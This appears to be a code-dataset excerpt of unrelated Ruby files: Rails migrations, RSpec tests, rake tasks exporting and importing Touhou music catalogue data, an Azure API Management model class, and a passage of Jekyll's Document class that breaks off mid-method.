s.dependency 'Starscream', '~> 3.0.5'
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.10'
s.tvos.deployment_target = '9.0'
end
| 34.863636 | 107 | 0.611473 |
26e11329775113ef00714a949e32390a774c7688 | 172 | class ChangeDescriptionNullOnAnnouncementTemplates < ActiveRecord::Migration[5.0]
def change
change_column_null :announcement_templates, :description, true
end
end
| 28.666667 | 81 | 0.825581 |
03841913deab190972306e9fd8a9afe8e4ade3fd | 2,714 | #
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Emilien Macchi <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Unit tests for neutron::services::fwaas class
#
require 'spec_helper'
# Verifies the fwaas_driver.ini settings plus the per-distro packages the
# class is expected to install (L3 agent on Debian, VPN agent when the
# vpnaas_agent_package parameter is enabled).
describe 'neutron::services::fwaas' do
  let :pre_condition do
    "class { 'neutron': rabbit_password => 'passw0rd' }"
  end
  let :params do
    {}
  end
  let :default_params do
    { :driver => 'neutron.services.firewall.drivers.linux.iptables_fwaas.IptablesFwaasDriver',
      :enabled => true,
      :vpnaas_agent_package => false }
  end
  # Shared across all platform contexts: the driver/enabled config entries
  # must always be written regardless of distro.
  shared_examples_for 'neutron fwaas service plugin' do
    let :params_hash do
      default_params.merge(params)
    end
    it 'configures driver in fwaas_driver.ini' do
      should contain_neutron_fwaas_service_config('fwaas/driver').with_value('neutron.services.firewall.drivers.linux.iptables_fwaas.IptablesFwaasDriver')
      should contain_neutron_fwaas_service_config('fwaas/enabled').with_value('true')
    end
  end
  context 'on Debian platforms' do
    let :facts do
      { :osfamily => 'Debian' }
    end
    let :platform_params do
      { :l3_agent_package => 'neutron-l3-agent',
        :vpnaas_agent_package => 'neutron-vpn-agent'}
    end
    it_configures 'neutron fwaas service plugin'
    it 'installs neutron l3 agent package' do
      should contain_package('neutron-l3-agent').with_ensure('present')
    end
  end
  context 'on Debian platforms with VPNaaS' do
    let :facts do
      { :osfamily => 'Debian' }
    end
    let :platform_params do
      { :l3_agent_package => 'neutron-l3-agent',
        :vpnaas_agent_package => 'neutron-vpn-agent' }
    end
    let :params do
      { :vpnaas_agent_package => true }
    end
    it_configures 'neutron fwaas service plugin'
    it 'installs neutron vpnaas agent package' do
      should contain_package('neutron-vpn-agent').with_ensure('present')
    end
  end
  context 'on Red Hat platforms' do
    let :facts do
      { :osfamily => 'RedHat' }
    end
    let :platform_params do
      { :package_name => 'openstack-neutron' }
    end
    it_configures 'neutron fwaas service plugin'
  end
end
| 26.871287 | 154 | 0.687546 |
d5ab038574bf8628f9ecc7aa8a1f516929536848 | 223 | class CreateRecipes < ActiveRecord::Migration[5.2]
def change
create_table :recipes do |t|
t.string :name
t.integer :creator_id
t.string :directions
t.string :total_prep_time
end
end
end
| 20.272727 | 50 | 0.668161 |
61ca6d0e288672d437d11d950ea504ed1ff0a5b3 | 2,222 | # frozen_string_literal: true
require 'rails_helper'
# View spec for prisoners/show: renders the template with stubbed assigns
# and checks the complexity badge and offender category markup.
RSpec.describe "prisoners/show", type: :view do
  let(:page) { Nokogiri::HTML(rendered) }
  let(:case_info) { build(:case_information) }
  let(:prison) { build(:prison) }
  let(:offender) { build(:mpc_offender, prison: prison, offender: case_info.offender, prison_record: api_offender) }
  before do
    assign(:prison, prison)
    assign(:prisoner, offender)
    assign(:tasks, [])
    assign(:keyworker, build(:keyworker))
  end
  describe 'complexity badges' do
    # Complexity levels only apply in women's prisons.
    let(:prison) { build(:womens_prison) }
    let(:api_offender) { build(:hmpps_api_offender, complexityLevel: complexity) }
    # NOTE(review): test_strategy appears unreferenced in these examples
    # (lets are lazy, so it never runs) — confirm and remove if truly unused.
    let(:test_strategy) { Flipflop::FeatureSet.current.test! }
    before do
      render
    end
    context 'with low complexity' do
      let(:complexity) { 'low' }
      it 'shows low complexity badge' do
        expect(page).to have_content 'LOW COMPLEXITY'
      end
    end
    context 'with medium complexity' do
      let(:complexity) { 'medium' }
      it 'shows medium complexity badge' do
        expect(page).to have_content 'MEDIUM COMPLEXITY'
      end
    end
    context 'with high complexity' do
      let(:complexity) { 'high' }
      it 'shows high complexity badge' do
        expect(page).to have_content 'HIGH COMPLEXITY'
      end
    end
  end
  describe 'offender category' do
    # The rendered label lives in the #category-code element.
    subject { page.css('#category-code').text }
    before { render }
    context "with a male category" do
      let(:api_offender) { build(:hmpps_api_offender, category: build(:offender_category, :cat_a)) }
      it 'shows the category label' do
        expect(subject).to eq('Cat A')
      end
    end
    context "with a female category" do
      let(:api_offender) { build(:hmpps_api_offender, category: build(:offender_category, :female_closed)) }
      it 'shows the category label' do
        expect(subject).to eq('Female Closed')
      end
    end
    context 'when category is unknown' do
      # This happens when an offender's category assessment hasn't been completed yet
      let(:api_offender) { build(:hmpps_api_offender, category: nil) }
      it 'shows "Unknown"' do
        expect(subject).to eq('Unknown')
      end
    end
  end
end
| 26.771084 | 116 | 0.656166 |
7a155f161b8359f9fd065a6bed46de9754245529 | 443 | class CreateReviews < ActiveRecord::Migration[5.2]
def change
create_table :reviews, id: :uuid do |t|
t.text :content
t.integer :stars
t.uuid :customer_id
t.uuid :worker_id
t.belongs_to :customer, foreign_key: {to_table: :users}, type: :uuid
t.belongs_to :worker, foreign_key: {to_table: :users}, type: :uuid
t.references :job,type: :uuid, foreign_key: true
t.timestamps
end
end
end
| 29.533333 | 74 | 0.654628 |
1cb4d97ed902189dc96b94f1f983b5ec98aa088c | 479 | require 'spec_helper'
module Brightcontent
  # Verifies that add_brightcontent_column extends the admin column list
  # without altering the model's real database columns.
  describe ModelExtensions do
    let(:columns) { ["id", "name", "body", "created_at", "updated_at", "featured"] }
    subject(:blog) { Blog }
    # By default the brightcontent columns mirror the table columns.
    its(:brightcontent_columns) { should eq columns }
    context "with extra method" do
      before { Blog.add_brightcontent_column("test_column") }
      its(:brightcontent_columns) { should eq columns + ["test_column"] }
      # The underlying ActiveRecord column list must remain unchanged.
      its(:column_names) { should eq columns }
    end
  end
end
| 29.9375 | 85 | 0.672234 |
ab01ab816f2e9bc6bccf08492f61862a0da9353b | 132 | require 'test_helper'
# Placeholder test case for RegionDistrictName; no assertions defined yet.
class RegionDistrictNameTest < ActiveSupport::TestCase
  # test "the truth" do
  #   assert true
  # end
end
| 16.5 | 54 | 0.727273 |
7989f11ec6e7c2747db097b4bca5607f1f93d895 | 12,621 | # frozen_string_literal: true
require 'csv'
namespace :touhou_music_discover do
namespace :export do
desc 'Touhou music with original songs file export'
task touhou_music_with_original_songs: :environment do
File.open('tmp/touhou_music_with_original_songs.tsv', 'w') do |f|
f.puts("jan\tisrc\ttrack_number\tspotify_album_id\tspotify_track_id\tspotify_album_name\tspotify_track_name\tapple_music_album_id\tapple_music_track_id\tapple_music_album_name\tapple_music_track_name\toriginal_songs")
Album.includes(:spotify_album, :apple_music_album, tracks: %i[spotify_tracks apple_music_tracks]).order(jan_code: :asc).each do |album|
jan = album.jan_code
# 特定のアルバムのみ出力する場合、コメントをオフにする
# next if jan != ''
apple_music_album = album.apple_music_album
apple_music_album_id = apple_music_album&.apple_music_id
apple_music_album_name = apple_music_album&.name
spotify_album = album.spotify_album
spotify_album_id = spotify_album&.spotify_id
spotify_album_name = spotify_album&.name
album.tracks.sort_by(&:isrc).each do |track|
isrc = track.isrc
apple_music_track = track.apple_music_track(album)
spotify_track = track.spotify_track(album)
track_number = apple_music_track&.track_number || spotify_track&.track_number
apple_music_track_id = apple_music_track&.apple_music_id
apple_music_track_name = apple_music_track&.name
spotify_track_id = spotify_track&.spotify_id
spotify_track_name = spotify_track&.name
original_songs = track.original_songs.map(&:title).join('/')
# 原曲の紐付けがまだの楽曲を出力する場合、コメントをオフにする
# next if original_songs.present?
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{spotify_album_id}\t#{spotify_track_id}\t#{spotify_album_name}\t#{spotify_track_name}\t#{apple_music_album_id}\t#{apple_music_track_id}\t#{apple_music_album_name}\t#{apple_music_track_name}\t#{original_songs}")
end
end
end
end
desc 'Touhou music file export'
task touhou_music: :environment do
File.open('tmp/touhou_music.tsv', 'w') do |f|
f.puts("jan\tisrc\tno\tcircle\tspotify_album_artist_name\tspotify_album_name\tspotify_artist_name\tspotify_track_name\tspotify_album_url\tspotify_track_url\tapple_music_album_artist_name\tapple_music_album_name\tapple_music_artist_name\tapple_music_track_name\tapple_music_album_url\tapple_music_track_url")
Album.includes(:circles, :apple_music_album, :spotify_album, tracks: %i[apple_music_tracks spotify_tracks]).order(jan_code: :asc).each do |album|
jan = album.jan_code
circle = album.circles&.map{_1.name}&.join(' / ')
apple_music_album_url = album.apple_music_album&.url
apple_music_album_artist_name = album.apple_music_album&.artist_name
apple_music_album_name = album.apple_music_album&.name
spotify_album_url = album.spotify_album&.url
spotify_album_artist_name = album.spotify_album&.artist_name
spotify_album_name = album.spotify_album&.name
album.tracks.sort_by(&:isrc).each do |track|
isrc = track.isrc
apple_music_track = track.apple_music_tracks&.find { _1.album == album }
spotify_track = track.spotify_tracks&.find { _1.album == album }
track_number = apple_music_track&.track_number || spotify_track&.track_number
apple_music_artist_name = apple_music_track&.artist_name
apple_music_track_url = apple_music_track&.url
apple_music_track_name = apple_music_track&.name
spotify_artist_name = spotify_track&.artist_name
spotify_track_url = spotify_track&.url
spotify_track_name = spotify_track&.name
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{circle}\t#{spotify_album_artist_name}\t#{spotify_album_name}\t#{spotify_artist_name}\t#{spotify_track_name}\t#{spotify_album_url}\t#{spotify_track_url}\t#{apple_music_album_artist_name}\t#{apple_music_album_name}\t#{apple_music_artist_name}\t#{apple_music_track_name}\t#{apple_music_album_url}\t#{apple_music_track_url}")
end
end
end
end
desc 'Touhou music album only file export'
task touhou_music_album_only: :environment do
File.open('tmp/touhou_music_album_only.tsv', 'w') do |f|
f.puts("jan\tcircle\talbum_name\tspotify_album_url\tapple_music_album_url")
Album.includes(:circles, :apple_music_album, :spotify_album).order(jan_code: :asc).each do |album|
jan = album.jan_code
circle = album.circles&.map{_1.name}&.join(' / ')
apple_music_album_url = album.apple_music_album&.url
apple_music_album_name = album.apple_music_album&.name
spotify_album_url = album.spotify_album&.url
spotify_album_name = album.spotify_album&.name
f.puts("#{jan}\t#{circle}\t#{spotify_album_name || apple_music_album_name}\t#{spotify_album_url}\t#{apple_music_album_url}")
end
end
end
desc 'Spotify touhou music file export'
task spotify: :environment do
File.open('tmp/spotify_touhou_music.tsv', 'w') do |f|
f.puts("JAN\tISRC\tトラック番号\tアルバム名\t楽曲名\tアルバムURL\t楽曲URL")
SpotifyAlbum.includes(:album, spotify_tracks: :track).order(:release_date).each do |album|
jan = album.jan_code
album_name = album.name
album_url = album.url
album.spotify_tracks.each do |track|
isrc = track.isrc
track_name = track.name
track_number = track.track_number
track_url = track.url
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{album_name}\t#{track_name}\t#{album_url}\t#{track_url}")
end
end
end
end
desc 'Output albums and songs as JSON for Algolia'
task for_algolia: :environment do
File.open('tmp/touhou_music_spotify_for_algolia.json', 'w') do |file|
albums = Album.eager_load(spotify_tracks: { track: { original_songs: :original } })
file.puts(JSON.pretty_generate(SpotifyAlbumsToAlgoliaPresenter.new(albums).as_json))
end
File.open('tmp/touhou_music_apple_music_for_algolia.json', 'w') do |file|
albums = Album.eager_load(apple_music_tracks: { track: { original_songs: :original } })
file.puts(JSON.pretty_generate(AppleMusicAlbumsToAlgoliaPresenter.new(albums).as_json))
end
end
desc 'Output files for random_touhou_music'
task to_random_touhou_music: :environment do
apple_music_songs = []
AppleMusicAlbum.includes(apple_music_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).each do |album|
album.apple_music_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
apple_music_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_apple.json', 'w') do |f|
f.puts JSON.pretty_generate(apple_music_songs)
end
apple_music_tsa_songs = []
albums = AppleMusicAlbum.includes(album: :circles, apple_music_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).where(circles: { name: '上海アリス幻樂団' })
albums.each do |album|
album.apple_music_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
apple_music_tsa_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_apple_tsa.json', 'w') do |f|
f.puts JSON.pretty_generate(apple_music_tsa_songs)
end
spotify_songs = []
SpotifyAlbum.includes(spotify_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).each do |album|
album.spotify_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
spotify_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_spotify.json', 'w') do |f|
f.puts JSON.pretty_generate(spotify_songs)
end
spotify_tsa_songs = []
albums = SpotifyAlbum.includes(album: :circles, spotify_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).where(circles: { name: '上海アリス幻樂団' })
albums.each do |album|
album.spotify_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
spotify_tsa_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_spotify_tsa.json', 'w') do |f|
f.puts JSON.pretty_generate(spotify_tsa_songs)
end
end
end
namespace :import do
desc 'Touhou music with original songs file import'
task touhou_music_with_original_songs: :environment do
songs = CSV.table('tmp/touhou_music_with_original_songs.tsv', col_sep: "\t", converters: nil, liberal_parsing: true)
songs.each do |song|
jan = song[:jan]
isrc = song[:isrc]
original_songs = song[:original_songs]
track = Track.find_by(jan_code: jan, isrc: isrc)
if track && original_songs
original_song_list = OriginalSong.where(title: original_songs.split('/'), is_duplicate: false)
track.original_songs = original_song_list
end
end
end
desc 'GitHub fetch Touhou music with original songs file import'
task fetch_touhou_music_with_original_songs: :environment do
url = 'https://raw.githubusercontent.com/shiroemons/touhou_streaming_with_original_songs/main/touhou_music_with_original_songs.tsv'
token = ENV['GITHUB_TOKEN']
if token.present?
headers = { 'Authorization' => "token #{token}" }
response = Faraday.get(url, nil, headers)
songs = CSV.new(response.body, col_sep: "\t", converters: nil, liberal_parsing: true, encoding: 'UTF-8', headers: true)
songs = songs.read
songs.inspect
max_songs = songs.size
songs.each.with_index(1) do |song, song_count|
jan = song['jan']
isrc = song['isrc']
original_songs = song['original_songs']
track = Track.find_by(jan_code: jan, isrc: isrc)
if track && original_songs
original_song_list = OriginalSong.where(title: original_songs.split('/'), is_duplicate: false)
track.original_songs = original_song_list
end
print "\r東方楽曲: #{song_count}/#{max_songs} Progress: #{(song_count * 100.0 / max_songs).round(1)}%"
end
else
puts 'GITHUB_TOKEN を設定してください。'
end
end
end
desc '原曲情報を見て is_touhouフラグを変更する'
task change_is_touhou_flag: :environment do
# Trackのis_touhouフラグを変更
Track.includes(:original_songs).each do |track|
original_songs = track.original_songs
is_touhou = original_songs.all? { _1.title != 'オリジナル' } && !original_songs.all? { _1.title == 'その他' }
track.update(is_touhou: is_touhou) if track.is_touhou != is_touhou
end
# Albumのis_touhouフラグを変更
Album.includes(:tracks).each do |album|
# トラック内にis_touhouがtrueがあれば、そのアルバムはis_touhouはtrueとする
is_touhou = album.tracks.map(&:is_touhou).any?
album.update!(is_touhou: is_touhou) if album.is_touhou != is_touhou
end
end
desc 'アルバムにサークルを紐付ける'
task associate_album_with_circle: :environment do
Album.missing_circles.eager_load(:spotify_album).each do |album|
artist_name = album&.spotify_album&.artist_name
artist_name = artist_name&.sub(%r{\AZUN / }, '')
artists = artist_name&.split(' / ')
artists = artists&.map { Circle::SPOTIFY_ARTIST_TO_CIRCLE[_1].presence || _1 }&.flatten
artists&.uniq&.each do |artist|
circle = Circle.find_by(name: artist)
album.circles.push(circle) if circle.present?
end
next unless album.circles.size.zero?
artist = Circle::JAN_TO_CIRCLE[album.jan_code]
circle = Circle.find_by(name: artist)
album.circles.push(circle) if circle.present?
end
end
end
| 46.230769 | 377 | 0.682989 |
ab7e4268d0c69b7dbbe159ecb632db1886edafdf | 10,185 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_07_07
module Models
#
# Report data.
#
class ReportRecordContract
include MsRestAzure
# @return [String] Name depending on report endpoint specifies product,
# API, operation or developer name.
attr_accessor :name
# @return [DateTime] Start of aggregation period. The date conforms to
# the following format: `yyyy-MM-ddTHH:mm:ssZ` as specified by the ISO
# 8601 standard.
#
attr_accessor :timestamp
# @return [Integer] Length of aggregation period.
attr_accessor :interval
# @return [String] Country to which this record data is related.
attr_accessor :country
# @return [String] Country region to which this record data is related.
attr_accessor :region
# @return [String] Zip code to which this record data is related.
attr_accessor :zip
# @return [String] User identifier path. /users/{userId}
attr_accessor :user_id
# @return [String] Product identifier path. /products/{productId}
attr_accessor :product_id
# @return [String] API identifier path. /apis/{apiId}
attr_accessor :api_id
# @return [String] Operation identifier path.
# /apis/{apiId}/operations/{operationId}
attr_accessor :operation_id
# @return [String] API region identifier.
attr_accessor :api_region
# @return [String] Subscription identifier path.
# /subscriptions/{subscriptionId}
attr_accessor :subscription_id
# @return [Integer] Number of successful calls.
attr_accessor :call_count_success
# @return [Integer] Number of calls blocked due to invalid credentials.
attr_accessor :call_count_blocked
# @return [Integer] Number of calls failed due to proxy or backend
# errors.
attr_accessor :call_count_failed
# @return [Integer] Number of other calls.
attr_accessor :call_count_other
# @return [Integer] Total number of calls.
attr_accessor :call_count_total
# @return [Integer] Bandwidth consumed.
attr_accessor :bandwidth
# @return [Integer] Number of times when content was served from cache
# policy.
attr_accessor :cache_hit_count
# @return [Integer] Number of times content was fetched from backend.
attr_accessor :cache_miss_count
# @return [Float] Average time it took to process request.
attr_accessor :api_time_avg
# @return [Float] Minimum time it took to process request.
attr_accessor :api_time_min
# @return [Float] Maximum time it took to process request.
attr_accessor :api_time_max
# @return [Float] Average time it took to process request on backend.
attr_accessor :service_time_avg
# @return [Float] Minimum time it took to process request on backend.
attr_accessor :service_time_min
# @return [Float] Maximum time it took to process request on backend.
attr_accessor :service_time_max
#
# Mapper for ReportRecordContract class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ReportRecordContract',
type: {
name: 'Composite',
class_name: 'ReportRecordContract',
model_properties: {
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
timestamp: {
client_side_validation: true,
required: false,
serialized_name: 'timestamp',
type: {
name: 'DateTime'
}
},
interval: {
client_side_validation: true,
required: false,
serialized_name: 'interval',
type: {
name: 'Number'
}
},
country: {
client_side_validation: true,
required: false,
serialized_name: 'country',
type: {
name: 'String'
}
},
region: {
client_side_validation: true,
required: false,
serialized_name: 'region',
type: {
name: 'String'
}
},
zip: {
client_side_validation: true,
required: false,
serialized_name: 'zip',
type: {
name: 'String'
}
},
user_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'userId',
type: {
name: 'String'
}
},
product_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'productId',
type: {
name: 'String'
}
},
api_id: {
client_side_validation: true,
required: false,
serialized_name: 'apiId',
type: {
name: 'String'
}
},
operation_id: {
client_side_validation: true,
required: false,
serialized_name: 'operationId',
type: {
name: 'String'
}
},
api_region: {
client_side_validation: true,
required: false,
serialized_name: 'apiRegion',
type: {
name: 'String'
}
},
subscription_id: {
client_side_validation: true,
required: false,
serialized_name: 'subscriptionId',
type: {
name: 'String'
}
},
call_count_success: {
client_side_validation: true,
required: false,
serialized_name: 'callCountSuccess',
type: {
name: 'Number'
}
},
call_count_blocked: {
client_side_validation: true,
required: false,
serialized_name: 'callCountBlocked',
type: {
name: 'Number'
}
},
call_count_failed: {
client_side_validation: true,
required: false,
serialized_name: 'callCountFailed',
type: {
name: 'Number'
}
},
call_count_other: {
client_side_validation: true,
required: false,
serialized_name: 'callCountOther',
type: {
name: 'Number'
}
},
call_count_total: {
client_side_validation: true,
required: false,
serialized_name: 'callCountTotal',
type: {
name: 'Number'
}
},
bandwidth: {
client_side_validation: true,
required: false,
serialized_name: 'bandwidth',
type: {
name: 'Number'
}
},
cache_hit_count: {
client_side_validation: true,
required: false,
serialized_name: 'cacheHitCount',
type: {
name: 'Number'
}
},
cache_miss_count: {
client_side_validation: true,
required: false,
serialized_name: 'cacheMissCount',
type: {
name: 'Number'
}
},
api_time_avg: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeAvg',
type: {
name: 'Double'
}
},
api_time_min: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeMin',
type: {
name: 'Double'
}
},
api_time_max: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeMax',
type: {
name: 'Double'
}
},
service_time_avg: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeAvg',
type: {
name: 'Double'
}
},
service_time_min: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeMin',
type: {
name: 'Double'
}
},
service_time_max: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeMax',
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 30.770393 | 77 | 0.473245 |
180f54fb67b65c5d5b7a89169473a8ce6feb8591 | 14,925 | # encoding: UTF-8
module Jekyll
class Document
include Comparable
extend Forwardable
attr_reader :path, :site, :extname, :collection
attr_accessor :content, :output
def_delegator :self, :read_post_data, :post_read
YAML_FRONT_MATTER_REGEXP = %r!\A(---\s*\n.*?\n?)^((---|\.\.\.)\s*$\n?)!m
DATELESS_FILENAME_MATCHER = %r!^(?:.+/)*(.*)(\.[^.]+)$!
DATE_FILENAME_MATCHER = %r!^(?:.+/)*(\d{2,4}-\d{1,2}-\d{1,2})-(.*)(\.[^.]+)$!
# Create a new Document.
#
# path - the path to the file
# relations - a hash with keys :site and :collection, the values of which
# are the Jekyll::Site and Jekyll::Collection to which this
# Document belong.
#
# Returns nothing.
def initialize(path, relations = {})
@site = relations[:site]
@path = path
@extname = File.extname(path)
@collection = relations[:collection]
@has_yaml_header = nil
if draft?
categories_from_path("_drafts")
else
categories_from_path(collection.relative_directory)
end
data.default_proc = proc do |_, key|
site.frontmatter_defaults.find(relative_path, collection.label, key)
end
trigger_hooks(:post_init)
end
# Fetch the Document's data.
#
# Returns a Hash containing the data. An empty hash is returned if
# no data was read.
def data
@data ||= {}
end
# Merge some data in with this document's data.
#
# Returns the merged data.
def merge_data!(other, source: "YAML front matter")
merge_categories!(other)
Utils.deep_merge_hashes!(data, other)
merge_date!(source)
data
end
def date
data["date"] ||= (draft? ? source_file_mtime : site.time)
end
def source_file_mtime
@source_file_mtime ||= File.mtime(path)
end
# Returns whether the document is a draft. This is only the case if
# the document is in the 'posts' collection but in a different
# directory than '_posts'.
#
# Returns whether the document is a draft.
def draft?
data["draft"] ||= relative_path.index(collection.relative_directory).nil? &&
collection.label == "posts"
end
# The path to the document, relative to the site source.
#
# Returns a String path which represents the relative path
# from the site source to this document
def relative_path
@relative_path ||= Pathutil.new(path).relative_path_from(site.source).to_s
end
# The output extension of the document.
#
# Returns the output extension
def output_ext
Jekyll::Renderer.new(site, self).output_ext
end
# The base filename of the document, without the file extname.
#
# Returns the basename without the file extname.
def basename_without_ext
@basename_without_ext ||= File.basename(path, ".*")
end
# The base filename of the document.
#
# Returns the base filename of the document.
def basename
@basename ||= File.basename(path)
end
# Produces a "cleaned" relative path.
# The "cleaned" relative path is the relative path without the extname
# and with the collection's directory removed as well.
# This method is useful when building the URL of the document.
#
# Examples:
# When relative_path is "_methods/site/generate.md":
# cleaned_relative_path
# # => "/site/generate"
#
# Returns the cleaned relative path of the document.
def cleaned_relative_path
@cleaned_relative_path ||=
relative_path[0..-extname.length - 1].sub(collection.relative_directory, "")
end
# Determine whether the document is a YAML file.
#
# Returns true if the extname is either .yml or .yaml, false otherwise.
def yaml_file?
%w(.yaml .yml).include?(extname)
end
# Determine whether the document is an asset file.
# Asset files include CoffeeScript files and Sass/SCSS files.
#
# Returns true if the extname belongs to the set of extensions
# that asset files use.
def asset_file?
sass_file? || coffeescript_file?
end
# Determine whether the document is a Sass file.
#
# Returns true if extname == .sass or .scss, false otherwise.
def sass_file?
%w(.sass .scss).include?(extname)
end
# Determine whether the document is a CoffeeScript file.
#
# Returns true if extname == .coffee, false otherwise.
def coffeescript_file?
extname == ".coffee"
end
# Determine whether the file should be rendered with Liquid.
#
# Returns false if the document is either an asset file or a yaml file,
# true otherwise.
def render_with_liquid?
!(coffeescript_file? || yaml_file?)
end
# Determine whether the file should be rendered with a layout.
#
# Returns true if the Front Matter specifies that `layout` is set to `none`.
def no_layout?
data["layout"] == "none"
end
# Determine whether the file should be placed into layouts.
#
# Returns false if the document is set to `layouts: none`, or is either an
# asset file or a yaml file. Returns true otherwise.
def place_in_layout?
!(asset_file? || yaml_file? || no_layout?)
end
# The URL template where the document would be accessible.
#
# Returns the URL template for the document.
def url_template
collection.url_template
end
# Construct a Hash of key-value pairs which contain a mapping between
# a key in the URL template and the corresponding value for this document.
#
# Returns the Hash of key-value pairs for replacement in the URL.
def url_placeholders
@url_placeholders ||= Drops::UrlDrop.new(self)
end
# The permalink for this Document.
# Permalink is set via the data Hash.
#
# Returns the permalink or nil if no permalink was set in the data.
def permalink
data && data.is_a?(Hash) && data["permalink"]
end
# The computed URL for the document. See `Jekyll::URL#to_s` for more details.
#
# Returns the computed URL for the document.
def url
@url ||= URL.new({
:template => url_template,
:placeholders => url_placeholders,
:permalink => permalink,
}).to_s
end
def [](key)
data[key]
end
# The full path to the output file.
#
# base_directory - the base path of the output directory
#
# Returns the full path to the output file of this document.
def destination(base_directory)
dest = site.in_dest_dir(base_directory)
path = site.in_dest_dir(dest, URL.unescape_path(url))
if url.end_with? "/"
path = File.join(path, "index.html")
else
path << output_ext unless path.end_with? output_ext
end
path
end
# Write the generated Document file to the destination directory.
#
# dest - The String path to the destination dir.
#
# Returns nothing.
def write(dest)
path = destination(dest)
FileUtils.mkdir_p(File.dirname(path))
File.write(path, output, :mode => "wb")
trigger_hooks(:post_write)
end
# Whether the file is published or not, as indicated in YAML front-matter
#
# Returns 'false' if the 'published' key is specified in the
# YAML front-matter and is 'false'. Otherwise returns 'true'.
def published?
!(data.key?("published") && data["published"] == false)
end
# Read in the file and assign the content and data based on the file contents.
# Merge the frontmatter of the file with the frontmatter default
# values
#
# Returns nothing.
def read(opts = {})
Jekyll.logger.debug "Reading:", relative_path
if yaml_file?
@data = SafeYAML.load_file(path)
else
begin
merge_defaults
read_content(opts)
read_post_data
rescue => e
handle_read_error(e)
end
end
end
# Create a Liquid-understandable version of this Document.
#
# Returns a Hash representing this Document's data.
def to_liquid
@to_liquid ||= Drops::DocumentDrop.new(self)
end
# The inspect string for this document.
# Includes the relative path and the collection label.
#
# Returns the inspect string for this document.
def inspect
"#<Jekyll::Document #{relative_path} collection=#{collection.label}>"
end
# The string representation for this document.
#
# Returns the content of the document
def to_s
output || content || "NO CONTENT"
end
# Compare this document against another document.
# Comparison is a comparison between the 2 paths of the documents.
#
# Returns -1, 0, +1 or nil depending on whether this doc's path is less than,
# equal or greater than the other doc's path. See String#<=> for more details.
def <=>(other)
return nil unless other.respond_to?(:data)
cmp = data["date"] <=> other.data["date"]
cmp = path <=> other.path if cmp.nil? || cmp.zero?
cmp
end
# Determine whether this document should be written.
# Based on the Collection to which it belongs.
#
# True if the document has a collection and if that collection's #write?
# method returns true, otherwise false.
def write?
collection && collection.write?
end
# The Document excerpt_separator, from the YAML Front-Matter or site
# default excerpt_separator value
#
# Returns the document excerpt_separator
def excerpt_separator
(data["excerpt_separator"] || site.config["excerpt_separator"]).to_s
end
# Whether to generate an excerpt
#
# Returns true if the excerpt separator is configured.
def generate_excerpt?
!excerpt_separator.empty?
end
def next_doc
pos = collection.docs.index { |post| post.equal?(self) }
if pos && pos < collection.docs.length - 1
collection.docs[pos + 1]
end
end
def previous_doc
pos = collection.docs.index { |post| post.equal?(self) }
if pos && pos > 0
collection.docs[pos - 1]
end
end
def trigger_hooks(hook_name, *args)
Jekyll::Hooks.trigger collection.label.to_sym, hook_name, self, *args if collection
Jekyll::Hooks.trigger :documents, hook_name, self, *args
end
def id
@id ||= File.join(File.dirname(url), (data["slug"] || basename_without_ext).to_s)
end
# Calculate related posts.
#
# Returns an Array of related Posts.
def related_posts
Jekyll::RelatedPosts.new(self).build
end
# Override of normal respond_to? to match method_missing's logic for
# looking in @data.
def respond_to?(method, include_private = false)
data.key?(method.to_s) || super
end
# Override of method_missing to check in @data for the key.
def method_missing(method, *args, &blck)
if data.key?(method.to_s)
Jekyll::Deprecator.deprecation_message "Document##{method} is now a key "\
"in the #data hash."
Jekyll::Deprecator.deprecation_message "Called by #{caller(0..0)}."
data[method.to_s]
else
super
end
end
def respond_to_missing?(method, *)
data.key?(method.to_s) || super
end
# Add superdirectories of the special_dir to categories.
# In the case of es/_posts, 'es' is added as a category.
# In the case of _posts/es, 'es' is NOT added as a category.
#
# Returns nothing.
def categories_from_path(special_dir)
superdirs = relative_path.sub(%r!#{special_dir}(.*)!, "")
.split(File::SEPARATOR)
.reject do |c|
c.empty? || c == special_dir || c == basename
end
